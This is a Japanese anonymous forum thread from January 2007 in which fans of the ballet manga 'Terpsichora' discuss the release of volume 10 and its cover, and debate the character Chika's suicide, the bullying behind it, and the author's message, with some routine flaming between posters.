554 :花と名無しさん:2007/01/19(金) 21:19:45 ID:???0
>>533
九州でも○○してあげる、を、○○しちゃる、とは言うよ。
今度饅頭持ってっちゃるけんなぁ、とか。

555 :花と名無しさん:2007/01/19(金) 21:37:08 ID:???0
芝浦工大の受験頑張ってね

556 :花と名無しさん:2007/01/19(金) 21:57:00 ID:???0
>>554
わぁ、遠く離れた九州でも同じなんだね。

ギシせんせは北海道出身だし、萩尾センセは九州出身だよね。
同じ感覚で合わせ易かったのかぁなんて想像してみると
あんまりスレ違いでもなくなる......といいなぁ。

557 :花と名無しさん:2007/01/19(金) 22:06:10 ID:???0
そういえばダビチンのナックス特集のヤスケンのインタビューでもそんなのあったね
北海道の人と九州の人は性格とかが似ているんじゃないかと

558 :花と名無しさん:2007/01/19(金) 22:15:24 ID:???0
そういえば茜って熊本生まれだよね?
激情したときに熊本弁で喧嘩とかしはじめたら楽しそう
ユキは確実にポカーンだ

559 :花と名無しさん:2007/01/19(金) 22:21:39 ID:???0
>>557
熊本や鹿児島だと眉がとってもぶっとい。
北海道でも本州からの移民じゃない人は眉がぶっとい。
遺伝子的に似てるんだよ。星野之宣の「ヤマタイカ」に出てくる。

560 :花と名無しさん:2007/01/19(金) 22:26:21 ID:???0
>>558
そこからひっこしてきただけで、そこ生まれかどうかまでは明らかじゃない。
なんとなく、転勤族で日本の県庁所在地を数年単位であっちこっち移り住んで
きた子供の雰囲気がある。
ものおじしないし、新しい環境に馴染むのはやいし。

561 :花と名無しさん:2007/01/19(金) 22:28:47 ID:???0
>>558
群馬の前が熊本だっただけで、転勤族の娘なんじゃないかと思っている。

562 :花と名無しさん:2007/01/19(金) 22:32:33 ID:???0
元いた民族が、北九州あたりから上陸して来た朝鮮〜中国民族においやられて
北と南にそれぞれ逃げただけの事。

563 :花と名無しさん:2007/01/19(金) 22:47:22 ID:???O
成る程、それで北九州は気性が荒いと(ry

564 :花と名無しさん:2007/01/19(金) 22:49:54 ID:???0
のちの聖徳太子である

565 :花と名無しさん:2007/01/19(金) 23:10:37 ID:???O
これからは、、大地のセリフは北関東訛りに変換しようっと

566 :花と名無しさん:2007/01/19(金) 23:55:51 ID:???0
そぉか、熊本にいたけど熊本生まれではないのか!!
残念だ、同郷だと思てたのに

567 :花と名無しさん:2007/01/20(土) 00:13:12 ID:???0
そうだとも、そうでないとも描かれてませんよ。
好きな様に補完するがよろしい。

568 :花と名無しさん:2007/01/20(土) 00:33:15 ID:???O
↑踊れない馬鹿がいる

569 :花と名無しさん:2007/01/20(土) 00:40:37 ID:???0
>522
おしいな、前ふたつは私だが、最後は別。
キモイのことモイキーとか言う人もいたっけねwwwwwwwwwww。
てか前ふたつと後ろは全然文体違うじゃん?
指摘したいんならもっとちゃんと読めよ。長くて分析も容易なんだから。
とりあえず522の文章の読み方は杜撰。きっと普段から無神経な口を無意識
に利くタイプ。


570 :花と名無しさん:2007/01/20(土) 00:51:50 ID:???O
>モイキー…φ(.. ) めもめもw

571 :花と名無しさん:2007/01/20(土) 01:03:05 ID:???0
モイキーってバブルっぽいなw

572 :花と名無しさん:2007/01/20(土) 01:05:33 ID:???0
よく長文でそこまで意味のない事を書けるな。

573 :花と名無しさん:2007/01/20(土) 06:27:07 ID:???0
>>569
話題もいい感じに戻ってきてるのに、何今頃出てきてんの
とんちんかんな分析といいお前ほんとに痛いなwww
死ね空気読めないババア

574 :花と名無しさん:2007/01/20(土) 06:45:19 ID:???0
>>569
なんでいきなりモイキーが出てくるの?
まあどうでもいいけど。
一連の流れを読んでた私から言えば、あんたのレスの方がよっぽど
不愉快だったが。>>488とかな。
馬鹿にされて他の人に叩かれてるのは、自分に理由があるからって分かるか?
そうやって人のレスにみっともなく噛み付くより、投稿する前に
少し自分のレスを見直したほうがいいぞ。

575 :花と名無しさん:2007/01/20(土) 07:17:58 ID:???0
みんな優しいなあ566みたいなヤバイ奴の相手してあげてw
とりあえずwwwの後ろに。つけてるのにバロス
2ch慣れしてないオバサンが頑張ってみました!!!みたいな感じがww

576 :575:2007/01/20(土) 07:25:05 ID:???0
あれ?頭のおかしいオバサンは>>569だね
失礼しました>566さん

577 :花と名無しさん:2007/01/21(日) 12:57:07 ID:???0
明後日、10巻楽しみ。

578 :花と名無しさん:2007/01/21(日) 14:15:49 ID:???O
昨夜からずっと見られなかった。

579 :花と名無しさん:2007/01/21(日) 15:22:16 ID:???0
鯖落ちてました

580 :花と名無しさん:2007/01/21(日) 19:54:16 ID:???0
うん、やっと見れて良かった。

581 :花と名無しさん:2007/01/22(月) 10:26:02 ID:???0
>>439
亀同意。

それと、チカちゃんがクラシックバレエを諦めて、コンテンポラリーだの
新体操だのシンクロだの車いすバレエだのに行く、或いはプリマを諦めて実家の
教室のバレエ教師でよしとする、又は勉強して整形の医者になる、という展開は
前向きであると同時に妥協の賜物なわけで、やっぱり美しさに欠けるし、
なによりチカちゃんらしくない。
作者も「ゴメン」て読者に謝ったくらいだから、ある程度迷い(死なせるかどうか)は
あったんだろうけど、具体的に比較検討してみるとやはり「自殺」になるよ。
チカちゃんの性格が、なんでもオールオアナッシング、白か黒、なんだもの。
自殺しなかったor自殺未遂で済んだとしても、プリマになれないと悟った時点で
精神は一旦死んだのだから、もうその後は精神的廃人でしょ。
表面上は(周囲に)心配掛けないように明るく振る舞ってたとしても、所詮抜け殻。
そういう人生に、なんの意味があるんだろう?と、多分チカちゃんも考えたんだよ。
読者としては、今後がつまらなくなったのは確かだけど、らしい選択ではあったね。
大体、テレプシの読者層は元々のギシファン@30代以上が多いんだから、
むりやり前向きポジティブな展開にする必要はないわけだしw

は〜朝から垂れ流してスキーリ。家事するわノシ

582 :花と名無しさん:2007/01/22(月) 10:39:39 ID:???0
迷いはないでしょう。ないから「ゴメン」なんだよ。
あったらそれはない。

583 :花と名無しさん:2007/01/22(月) 10:41:16 ID:???0
10巻の発売は明日だから>1を見て買いに行ってもないんだよな。
早売り買った方、オマケに何が収録されてるか教えて欲しい。

584 :花と名無しさん:2007/01/22(月) 10:45:15 ID:???0
帯予想
10巻 ( 真 っ 白 )

585 :花と名無しさん:2007/01/22(月) 10:56:59 ID:???0
>新体操だのシンクロだの車いすバレエだのに行く、或いはプリマを諦めて実家の
教室のバレエ教師でよしとする、又は勉強して整形の医者になる、という展開

それ以外にもあるかも。
早い時期に駿と結婚して娘産んで、その子にプリマを目指させる。

586 :花と名無しさん:2007/01/22(月) 11:10:44 ID:???0
>585
それなら、息子を産んで貸出料で稼ぐのが・・・

チカはプリマになれないのは妥協というか屈辱かも知れないけど
あの
「下手でも良い、笑われても良い」から今すぐにでも
とにかくバレエが踊りたい!の気持ちの方でいければ良かったと思うよ。
そこはやっぱり手術費用や周囲の期待と
それに応えないと許せない自身のプライドが追いつめたんだろうな。
下手でも踊ってるのは千花じゃないかもしれないけど
何よりバレエが一番で、ハンデも一見わからないくらいに克服して遅咲きで咲いて欲しかった。
もちろん将来活躍するための道へ進む時期は逃すから望んでる地位にはなれないだろうけど。

587 :花と名無しさん:2007/01/22(月) 11:18:01 ID:???0
で、10巻にはチカの死まで入るんだろか?

588 :花と名無しさん:2007/01/22(月) 11:18:31 ID:???0
娘を二人産んだら長女は出来が良くて周囲から期待されてたんだけど
怪我で絶望し自殺・妹は振付師に…

589 :花と名無しさん:2007/01/22(月) 11:22:05 ID:???0
正直10巻より来月のダ・ヴィンチのほうが楽しみだ。
久々に買うかも。

590 :花と名無しさん:2007/01/22(月) 11:47:59 ID:???0
明日10巻発売だけど、もう今日売ってるかな?
都内なんだけど見かけた方います? ノ

591 :花と名無しさん:2007/01/22(月) 11:50:05 ID:???0
>>587
第一部完結って書いてあるだろ!
ついでに9巻までと値段が違う所も気付いとけ。

592 :花と名無しさん:2007/01/22(月) 12:21:15 ID:???0
>>585
恋を一度もせずにあの世に旅立ってしまったのが不憫だ。
生理が来た事も母娘で喜べなかったし。(ユキもえーって感じだし。)
普通はおめでとうって言って不安をフォローしてあげるよね。

593 :花と名無しさん:2007/01/22(月) 12:27:57 ID:???O
チカにとって恋愛なんてどーでも良かったんだろうな…

594 :花と名無しさん:2007/01/22(月) 13:11:49 ID:GImNYOkl0
いま、本屋にいってきたけど
10巻、今日ははいってないって言われた。
がっくり。
発売延期ですか?


595 :花と名無しさん:2007/01/22(月) 13:12:30 ID:???0
23日じゃなかった?<発売日

596 :sage:2007/01/22(月) 13:12:44 ID:???0
ごめん。あげちゃった。

597 :sage:2007/01/22(月) 13:17:35 ID:???0
23日だった。すまん。
ここの1を見て、本屋に走ってしまった。

598 :花と名無しさん:2007/01/22(月) 13:48:00 ID:???O
>>1に騙された人あと何人いるんだろう。
よく未確認情報を平然と載っけるな。
それを鵜呑みにするやつもするやつだけど。

599 :花と名無しさん:2007/01/22(月) 13:49:57 ID:???0
同じく1を見て22日だと思ってた
金曜に早売りを求めて本屋に行っちゃったじゃないかw

600 :花と名無しさん:2007/01/22(月) 14:50:12 ID:???0
明日の10巻発売に備えて、9巻まで再読しました。
あー、明日が楽しみだ。

601 :花と名無しさん:2007/01/22(月) 15:17:53 ID:???0
>>591
値段変わってないはず。

602 :花と名無しさん:2007/01/22(月) 15:51:13 ID:???O
1〜9巻各620円(税込)
10巻651円(税込)だよ

603 :花と名無しさん:2007/01/22(月) 16:19:23 ID:???0
10巻の価格はアマゾンは従来どおり620円
紀伊国屋は651円になってる。
しかも新宿と大手町には在庫ありになってるぞ。
もう売ってるのか?

604 :花と名無しさん:2007/01/22(月) 16:25:35 ID:???O
一話予定より多くなったからその分高くなったのかな。
普通は一巻七話収録のところ、10巻は八話あるんだよね。

605 :花と名無しさん:2007/01/22(月) 16:27:20 ID:???0
別のコミックスだけど今日だか明日発売予定のが19日に出てたり
するとこもあるようだから店によってはあるのかもね

606 :花と名無しさん:2007/01/22(月) 16:32:18 ID:???0
じゅんく堂も在庫ありになってる@池袋店
新宿店もあるかなー

607 :花と名無しさん:2007/01/22(月) 17:08:36 ID:???0
発売日23日だったのか。
どうりで今日の書き込み数が増えてないわけだ。

608 :花と名無しさん:2007/01/22(月) 17:14:09 ID:???0
書き下ろしあるかな?
エッセイ漫画久々に読みたい

609 :花と名無しさん:2007/01/22(月) 17:20:31 ID:???0
アマゾンに10巻の表紙キター。

610 :花と名無しさん:2007/01/22(月) 17:34:13 ID:???0
>>609
チカちゃんだね。オレンジ色か〜
最初の頃、表紙の色にも意味?があるようなことが、ここでも言われていたけど
(最初の3巻までが黒、その後明るい色・・・)なんか関係ないような気がしてきた。

611 :花と名無しさん:2007/01/22(月) 17:51:03 ID:???0
表紙の人は特に誰って事はないと思う。

612 :花と名無しさん:2007/01/22(月) 17:53:44 ID:???0
千花ちゃんに見える。
誰ってことない表紙もあれば、今までも千花ちゃんに見えた表紙もあった。

613 :花と名無しさん:2007/01/22(月) 18:10:14 ID:???O
チカかも知れないしチカじゃないかも知れない。
どっちでもいい。作者が公表してないんだからどっちかって決まってはいないよね。

614 :花と名無しさん:2007/01/22(月) 18:26:26 ID:???0
内容が重たいからこそ、紫や黒でなく
オレンジの表紙で良かった。

615 :花と名無しさん:2007/01/22(月) 18:38:22 ID:???0
車内から夕焼けに染まるビル群見てたチカちゃん...そのオレンジ色かとおもた。

616 :花と名無しさん:2007/01/22(月) 18:39:37 ID:???0
まあ、オレンジって黄昏色ともいえるから、内容に合ってなくもないか。

617 :花と名無しさん:2007/01/22(月) 18:43:29 ID:???0
美しい反張膝なのが悲しい。。。>表紙

618 :花と名無しさん:2007/01/22(月) 18:53:16 ID:???0
反張膝でなかったら....
バレエさえやっていなかったら....
完璧主義でなかったら....

仮定ばっかりだけどね。それが千花ちゃんなんだけど。

619 :花と名無しさん:2007/01/22(月) 19:10:05 ID:???0
黒い衣装がはえる様に彩度の高いオレンジなのかと思った。

620 :花と名無しさん:2007/01/22(月) 20:02:12 ID:???0
表紙の絵は、グランパクラシックだっけ?

621 :花と名無しさん:2007/01/22(月) 20:06:40 ID:???O
今日発売だと思って、
店員さんに突撃しちゃったorz

622 :花と名無しさん:2007/01/22(月) 21:08:30 ID:???0
>>620
表紙画像拡大すると、隅っこに「グランパ・クラシックより」って
表記があるのが見えるよ。

ふとみが「あんたがこれやると膝痛める」って言われた部分だよね。
Youtubeのギエムの動画見た限りでは簡単な動きみたいに見えるん
だけど、それは上手な人がやってるからなんだろうなあ……。

623 :花と名無しさん:2007/01/22(月) 22:30:56 ID:???0
>>618
そうだよね…
また、周りも完璧なものを期待しちゃうし。
もう、「踊りを楽しむ」なんていうものが許されないくらい
素晴らしい子だったのが、彼女の悲劇だ。

624 :花と名無しさん:2007/01/22(月) 22:50:33 ID:???0
私も妹のいる長女だったからすごくこの作品好きだったのに(過去形です!!)
あれだけ優秀な千花ちゃんには成功すべきだと思ってたのに。


625 :花と名無しさん:2007/01/22(月) 22:56:05 ID:???0
素晴らしい子だったっていうか(すごくいい子だけど。千花も六花も)、
素晴らしくあらねば、という状態の子だったのが悲劇。

626 :花と名無しさん:2007/01/22(月) 23:16:01 ID:???0
すげーさりげに今日本屋に突撃した人が何人かいるねw
自分はどっちみち明日の予定だったけど。

なんだ、表紙オレンジかー。白が良かったな。トゥオネラにいるんだから。

627 :花と名無しさん:2007/01/22(月) 23:39:57 ID:???0
>626
テンプレの効果ってあるんだなと思った。
ちょっと前にでてた27円の解説とかさ。
千花の死なんかもこのテンプレで知った人もいるのかな。

628 :花と名無しさん:2007/01/23(火) 02:28:00 ID:???0
千花の死は正直テンプレにはいれないで欲しかった・・。
まあスレ見ればわかっちゃうことだけどさぁ。
千花死んだんですか?て人がいっぱい来てたの?

629 :花と名無しさん:2007/01/23(火) 03:10:41 ID:???0
>>626-627
ノシ
私もテンプレ見て、昨日は朝から3軒の本屋ハシゴしたよ…。
最初の2店は地元の小さな書店だけに
「開店直後だからまだ並んでないんだな」と諦めたが、
東京の大型書店でもなくておかしいと気づき、店員に聞いて事実を知った。
仲間が多くて嬉しいやら哀しいやら。


630 :どっかの大統領さん:2007/01/23(火) 06:04:47 ID:???O
うわっ!
なんだこのスレは!
はっ?おれが読まれている?
本国にもいないすごい住人達だ!

631 :花と名無しさん:2007/01/23(火) 07:39:18 ID:???0
オレンジは夕暮れだと思う。
千花が見てたのって朝焼けじゃなかったっけ?
その色なのかも知れないけど。

632 :花と名無しさん:2007/01/23(火) 10:22:36 ID:???0
>628
テレプシを読み始めた人には重大なネタバレだしね。
ないほうがいいのかも。

633 :花と名無しさん:2007/01/23(火) 11:43:59 ID:???O
今読み終わりました。六花を迎えにきた金子先生の無表情な顔が怖かった。ああ遂に・・という感じで。本屋の帰りに喫茶店で読もうかななんて思ったんだけど家で読んでよかった。漫画でこんなに泣いたのは初めてでしたよ。

634 :花と名無しさん:2007/01/23(火) 12:08:50 ID:???O
朝刊に10巻の広告がデカデかと載っていてびっくりした。

635 :花と名無しさん:2007/01/23(火) 12:12:31 ID:???O
>>628
コミクス派で「チカちゃんはどうなりましたか?」という人がたくさんいたよ。
連載派でもネタバレが多い時期で、ネタバレは良いか悪いかで荒れてたから
いっそこのスレではネタバレは解禁という事になりました。
で、ネタバレを読んでも泣かないことというのも天ぷらにあるでしょ。

普通の感覚とは違うので、天ぷらはよく読んで欲しいね。

636 :花と名無しさん:2007/01/23(火) 12:19:42 ID:???O
表紙、グランパクラシック(だっけ?茜が踊るといってた)の衣装を着た千花…?
尼で表紙見ただけで泣きそうだよ。

637 :花と名無しさん:2007/01/23(火) 12:34:49 ID:???0
10巻帯…。
だびちん読んでいたのに、改めてまとめて読むとやはり重い…。

638 :花と名無しさん:2007/01/23(火) 13:12:07 ID:???O
帯、なんて書いてありますか?
教えてください!

639 :花と名無しさん:2007/01/23(火) 13:26:00 ID:???0
>>638
>>421

640 :花と名無しさん:2007/01/23(火) 13:51:39 ID:???0
一部が終わって色々なことが明らかにされましたが・・
結局ゆきがくるみ割りの橇にのるシーンで、「逆側よ!」と
ささやいてたのは誰だったんだろう・・?

641 :花と名無しさん:2007/01/23(火) 13:59:41 ID:???0
>>640
オペラ座の怪人

642 :花と名無しさん:2007/01/23(火) 14:03:24 ID:???0
篠原祖母の入院ってなんの伏線かと思ってて、
このスレでも、篠原家窮乏化とか逆に遺産相続とか言われてたけど、
自殺した千花ちゃんに成仏の手段を与えるためだったんだね。

643 :花と名無しさん:2007/01/23(火) 14:08:26 ID:???0
>640
これもテンプレに入れたほうがいいのでは?
舞台にいた誰かとしか言えないし。
あっちの解釈もつけてね。

644 :花と名無しさん:2007/01/23(火) 14:26:20 ID:???0
あっちよ!を回収せずに終え読者に丸投げなら
読んだ人の思うとおりで良いんじゃないかと思うけどなぁ。
バタバタした中、袖幕の何枚目から出るかを言ったのを六花が勘違いしたとか。
確かに代役続きはラッキーかもしれんが
踊る訳じゃなくて棒立ちだけのクララにそこまでやっかまれるとも思えんし。
あそこは何が何でも六花が上下を間違える必要があったので
大した意味づけはなく描かれていると思う。

645 :花と名無しさん:2007/01/23(火) 14:30:39 ID:???0
お母さんシドイよシドイ…(涙)
ぢがぢゃんが死んだのは半分位お母さんのせいだお…

646 :花と名無しさん:2007/01/23(火) 14:43:12 ID:???O
うーん…
連載中は、チカの結末は安易?と思ったりもしたのだが、まとめて読むとやっぱりこれしか無いと言うか。
改めてギシ先生は凄いと思った。
空美のことも忘れたわけではないと信じる。

647 :花と名無しさん:2007/01/23(火) 14:45:36 ID:???0
>644
あっちに関しては六花のグランジュデのきっかけにすぎないと思う。
でも誰が言ったか?というのはたびたび出てくるよね。
一時期テンプレに説明が入ってたような気がする。

648 :花と名無しさん:2007/01/23(火) 15:02:55 ID:???0
やっぱりチカをイジメてたあの女は許せんなあ
地獄でさまよう描写でもしてくんないと(恐怖短編じゃあるまいし)

649 :花と名無しさん:2007/01/23(火) 15:10:53 ID:???O
まとめて読むとずっしり来るね…

連載時はここの感情的なチカヲタに呆れて何も感じなかったけど、
コミクスで読むと悲しい…

ただ千恵子が自分を責めてるけど、あの母、いじめ、頑固な本人の性格、ユキの頑張り
全てがチカを自殺に追いやった原因になったと思う。
自殺に至る一本道だ。

この話(第一部)は、ユキの成長とチカの自殺へと至る追い込み、
両方が車輪のように平行して、ときどき絡み合いながら進んで行ったんだなあ…
だからどっちも欠かせないし、安易には思えないよ。

第二部(あるのなら)はクミが出て来ると信じるw

650 :花と名無しさん:2007/01/23(火) 15:40:42 ID:???0
新聞広告のセンセの文。
「今回の10巻で、
バレエに関わる少女たちの物語もひとつの区切りをむかえました。
ぜひ六花ちゃんと一緒に、泣いたり笑ったりしてください。
そこからバレエの魅力を感じ、
また、生きる強さを感じていただけたらうれしく思います。」

チカちゃんは・・・弱かっ・・た・・・?

651 :花と名無しさん:2007/01/23(火) 16:01:54 ID:???0
>生きる強さを感じていただけたら

えええ??
中心人物の一人を自殺させといて、それはねーべ?
まさか、自殺を考えたけど思いとどまったふとみちゃんはエライ!とか
姉の死を肥やしにしてコリオグラファーとして誕生したユキちゃんはスゴイ!とか
そんな感想を持てと言ってるわけえ?>ギシ先生

652 :花と名無しさん:2007/01/23(火) 16:02:54 ID:???0
ちょっと前に苛めが問題になっていた時に、速報板のスレを読んだけど、
苛めた側というのは改心しないという印象。
「あいつが悪いから苛められて仕方ない」という論法が多い。
自殺とか苛め事件せ騒がれれば、尚更そうやって自分を守ろうとする。
まして性悪な奴は相手の不幸を当然の報いと思ったりしそう。
でも毛箱への復讐は望まない。それにああいうのって本人は要領良く生きているつもりでも
質の悪い生き方だから幸せとも思えない。

653 :花と名無しさん:2007/01/23(火) 16:04:49 ID:???0
>>651
六花は本人にルードラから誘われるだけの資質があったわけで、
姉の死を肥やしにとまでいうのは言いすぎ。

654 :花と名無しさん:2007/01/23(火) 16:07:01 ID:???0
六花ちゃんに感情移入して、悲しみから立ち直った姿に
「生きる強さ」を感じてほしいんだろうけどさ・・・。


655 :花と名無しさん:2007/01/23(火) 16:09:41 ID:???0
>>653
いや、才能は元からあったのはわかってるけど、
トガシーが言ってた、ユキに足りない「何か」って、平たく言うと
「腹をくくってない」ってことでしょ?
それが、姉の死というショッキングな出来事を経て、「性根が据わった」というか。
だったら、言い方はものすごく悪いけど、やっぱり「肥やし」的な部分はあるよ。

656 :花と名無しさん:2007/01/23(火) 16:11:19 ID:???0
でもルードラのおっさんは発想には目を付けたけど
実際踊る姿は知らないんだよね。
まぁポーズとかにも問題なかったせいもあるんだろうけど。

ヨーロッパでクラシックの基礎レッスンとかはヘロヘロなんだけど
独創的な踊りをするので在籍してる日本人女性がいるね。
ああいう感じにしたいのかなぁ?
せいぜい子供番組の踊りのおねえさんくらいになりそうだが。

657 :花と名無しさん:2007/01/23(火) 16:11:50 ID:???0
>636
表紙、私もきた…白と黒だもんね衣装…

658 :花と名無しさん:2007/01/23(火) 16:13:28 ID:???0
六花が成功するのが気に入らない。
篠原バレエ団のお手伝いが分相応。

659 :花と名無しさん:2007/01/23(火) 16:14:20 ID:???0
毛箱も憎いけど、六花がもっと憎い。それが正直な感想。

660 :花と名無しさん:2007/01/23(火) 16:15:11 ID:???0
>>654
普通、一生立ち直れないと思うけどね...家族は。
表面的には元気そうにしててもね...

661 :花と名無しさん:2007/01/23(火) 16:15:15 ID:???0
千花ちゃんはあれだけ素晴らしい子だったから、
やっぱり千花ちゃんのプリマ姿を見たかったよ。
どうしてもそれが駄目なら、医者として成功する姿が見たかった。

662 :花と名無しさん:2007/01/23(火) 16:19:18 ID:???0
千花ちゃんの方が六花よりずっと才能があるよ。
なのに成功できないなんてあんまりだ。

663 :花と名無しさん:2007/01/23(火) 16:20:01 ID:???0
妹の方が成功する話イラネ

664 :花と名無しさん:2007/01/23(火) 16:21:50 ID:???0
第二部では、自宅のレッスン場の鏡の中に、時々登場します。>千花
本部にも出ます。

665 :花と名無しさん:2007/01/23(火) 16:23:34 ID:???0
ユキちゃんは悪くない。
ケバコは不幸になってほしい。

666 :花と名無しさん:2007/01/23(火) 16:24:55 ID:???0
千花ちゃんは恵まれ過ぎて(成績トップ、コンクール入賞、顔よし、
金持ちの家、途中まで挫折知らず、苦手なことは演技くらい)
不幸な展開になる引き換えとして与えられた恩恵に見えた。
もちろん真面目過ぎる性格ゆえにぽっきり来る背景というのもあるにせよ。

667 :花と名無しさん:2007/01/23(火) 16:25:14 ID:???0
ソレ(・∀・)イイ!

668 :花と名無しさん:2007/01/23(火) 16:28:12 ID:???0
まあ、太く短い人生だったよな。。。>チカ


669 :花と名無しさん:2007/01/23(火) 16:29:45 ID:???0
「生きる強さ」は千花六花の喩え話の意味じゃなく、
ただ純粋な「人の生への賛辞」だと思うが。

内容があれだから「じゃあチカは弱くて、死んだ人はダメなのか」と
するのは読解力に少し難ありなんじゃ…。

670 :花と名無しさん:2007/01/23(火) 16:33:12 ID:???0
>>669
それはギシの言葉を都合良く解釈してあげ杉。

671 :花と名無しさん:2007/01/23(火) 16:39:40 ID:???0
毛箱と六花がいなければ!

672 :花と名無しさん:2007/01/23(火) 16:41:13 ID:???0
六花嫌いな人っていろいろ恵まれてなさそうね

673 :花と名無しさん:2007/01/23(火) 16:45:44 ID:???O
>ぜひ六花ちゃんと一緒に、泣いたり笑ったりしてください。
(中略)
>また、生きる強さを感じていただけたらうれしく思います。


作中の千恵子の「強さをしいられて」「私がチカを追いつめて」という言葉。


ここから何故、ユキが強くてチカが弱いと作者が言っているという結論が出るのだろうか?

「生きる強さ」は「生きているから強い」とイコールじゃないんだけど
それがわからないのか、敢えて読まないようにしてるのか…

674 :花と名無しさん:2007/01/23(火) 16:50:06 ID:???O
もしもし、愛する六花ちゃん、わたし ビルからとびおりるのよ

675 :花と名無しさん:2007/01/23(火) 17:02:01 ID:???O
ユキのせいで、チカちゃんが死んだわけじゃないし
チカちゃんが困難から立ち上がっていく姿も見たかったけどさ
チカちゃんは、巡り合わせが悪すぎた
チカちゃんが亡くなったのは悲しいけど、
それによってユキだって、一生癒えない傷を負ったわけだし
何歳になっても思い出すと思うよ

676 :花と名無しさん:2007/01/23(火) 17:03:24 ID:???0
>>666
顔よし、頭良し、家柄良し、やたら成功する人や
芸術の才能にも学業にも秀でている人っているけど、
でもそういう人にも苦労や苦手なことだってあるもんね。
そういうのと違って、途中までの千花ちゃんはあまりに出来すぎて、
お話的に(ギシ漫画的に)、逆に不吉な展開を感じさせる感じだった。

前に>>666と似たような意見の後、
「今幸せな人はやがて不幸になるのかな?」と幸せな他人の不幸を
望むような書き込みがあったけど、そういうものではなく、
ただ人間には苦もあれば楽もあるんだと思う。

677 :花と名無しさん:2007/01/23(火) 17:11:00 ID:???0
>>673
千花ちゃんがすごくいい子なのがポイントなのかな。
いい子だから死んだとかでなく。
性格の悪い子だって、思い通りにいかなくなって精神を病んだり
自殺したりすることだってある。
でも自殺した子の性格がよろしくないと、自業自得っぽくなって、
強さを強いられたり、特定の自己イメージに縛られたりしてポキッと
来るテーマのようなものが、ぼやける。

678 :花と名無しさん:2007/01/23(火) 17:22:01 ID:???0
>>673
あなたこそわかっているようでわかってない。
ギシの言う「生きる強さ」は「生きていく強さ」。
「生きているから強い」でも「人の生への賛辞」でもないよ。

679 :花と名無しさん:2007/01/23(火) 17:27:45 ID:???0
>>678
あなたこそわかってるようでわかってない。

「生きる強さ」は「生きていく強さ」ですか。
フーン

680 :花と名無しさん:2007/01/23(火) 17:29:27 ID:???0
ここの人たちはほんとに何でもふか〜く読むんだね。すごい。
コミック派で今日10巻読んだけど、単純にチカちゃんが壊れていく様子に
大げさに言うとぞっとした。
特に、背を向けて胡坐をかいてゲームをしている姿。
ここで散々語られたと思うけど、おばあちゃんを見舞ったあと
車の中から朝焼けを眺めながら何を考えていたのかな?
たまたま高いビルが描かれていたけれど、ビルを見てあの時点で
あそこから飛び降りようと思ってたわけじゃないよね。
死後発見された手帳に「おばあちゃんが死んじゃいけないって言った気がした」と
書いていたし、一度はやり直そうと思ったチカだったけど、その後
改めてさらにケバコに追い詰められたって感じだったのかな?

681 :花と名無しさん:2007/01/23(火) 17:33:12 ID:???O
>>678
そうだよ。自分が言いたいのは、ギシは「生きていく強さ」を描きたかったということ。
別に人生賛歌?(その言葉自体意味分からんが)だとか言ってませんが。


なにしろ一巻の煽りが「生きることは舞に似ている」で、
実際その舞は「こんなにも強さをしいら」れるものだった。
この物語のしめで「生きる強さを感じていただけたら」は
秀逸なコメントだと思うよ。

誰が強いか弱いかではなくて、みんな誰しも悩みを抱えている
みたいな事を描きたかったんだと思う。
言葉にすると陳腐だけどw

682 :花と名無しさん:2007/01/23(火) 17:36:30 ID:???O
人生賛歌じゃなくて、人の生の賛辞か。ソマソ

683 :花と名無しさん:2007/01/23(火) 17:42:29 ID:???0
もし、自殺問題で世論が騒ぎ出したのが(10月だっけ)
作中より早かったら、
チカちゃんは死ななかったような気もする・・・

センセ、「ヴィリ」よりこの辺について、思うことを一本描いてほしかったな。

684 :花と名無しさん:2007/01/23(火) 17:44:22 ID:???0
×自殺問題→○いじめ自殺問題

685 :花と名無しさん:2007/01/23(火) 17:49:43 ID:???0
茜も少しくらい挫折してみたらどうなんだ

686 :花と名無しさん:2007/01/23(火) 17:54:36 ID:???O
いじめで自殺なんて二十年前からあるけどなあ…

687 :花と名無しさん:2007/01/23(火) 18:00:41 ID:???0
茜は、スタイルと身体能力にすごく恵まれてのし上がってきた
感じだから(千花はバレエ教師の親が教育しまくった)
あまり挫折しなさそー。
でもローザンヌ通過するかな?
したらそう知名度は高くないけど、そこそこやっていけるかも。

688 :花と名無しさん:2007/01/23(火) 18:09:30 ID:???O
顔で損してるからねw>茜

689 :花と名無しさん:2007/01/23(火) 18:11:40 ID:???0
>>681
>誰が強いか弱いかではなくて、みんな誰しも悩みを抱えている
そんなもんだと思う。
ただ千花は、強さを強いられる(弱みを見せたがらない)し、
完璧主義で、「見返してやる」「あいつ」「〜したら負け」「〜よりもっと」
と他人や勝ち負けを意識するから、ぽっきり来易そう。
でもこういうタイプって性悪が多いのに、
千花ちゃんって希に見るいい子なんだよね。
毛箱は強くて優れた自分を維持するために卑劣なことをする感じがする。

茜はあまり悩んでなさそうだけど、あまりに「身体能力」で楽して、
しかもそれを良しとする性格が、大成を妨げるのだろか。

690 :花と名無しさん:2007/01/23(火) 18:12:37 ID:???0
>>688
それだw

でも大地が千花ちゃん好きなのを知って
ショック受けている所が可愛い。
この二人案外似合ってるよ。

691 :花と名無しさん:2007/01/23(火) 18:18:00 ID:???0
今頃読んだ。
ん〜、ギシ先生の言葉

>また、生きる強さを感じていただけたらうれしく思います。

「生きていくために必要な強さ」なんじゃないかなぁ…。

692 :花と名無しさん:2007/01/23(火) 18:24:31 ID:???0
本屋行ったら平積みだった。しかもただの平積みじゃない、今までのも含め
全巻平積みだった!!新書コーナーは広いとは言えないのにやってくれるな
紀伊国屋書店!!速攻ゲト。

所で表紙、オレンジというか山吹色に自分には見えたんだけど・・・。

693 :花と名無しさん:2007/01/23(火) 18:25:45 ID:???0
毛人も憎いけど、フッツーがもっと憎い。それが正直な感想。

694 :花と名無しさん:2007/01/23(火) 18:25:56 ID:???O
>>689
毛箱は、チカちゃんみたいなタイプが、癇に障ってしょうがなかったんだろね
卑劣なことをしてないと、自分の権力や地位を守れないのに、
チカちゃんは、そういうことに無関心で、ひたすらバレエに夢中
(もちろんイジメられて傷ついてはいたわけだけど、)
チカちゃんは、毛箱のアイデンティティを崩壊させるような存在に移ったんじゃないかな

695 :花と名無しさん:2007/01/23(火) 18:27:18 ID:???0
>>691
その意味だと、後に続く文は「感じていただけたら」より
「(について)考えていただけたら」にならないかな。

ま、このスレの皆様方はもうええっちゅうほど考えてらっしゃるようですがw

696 :花と名無しさん:2007/01/23(火) 18:32:02 ID:???0
実力では全く歯が立たない、或いは自分でどうにもできない部分で負けている相手をこそ、
いじめるもんらしいからね。
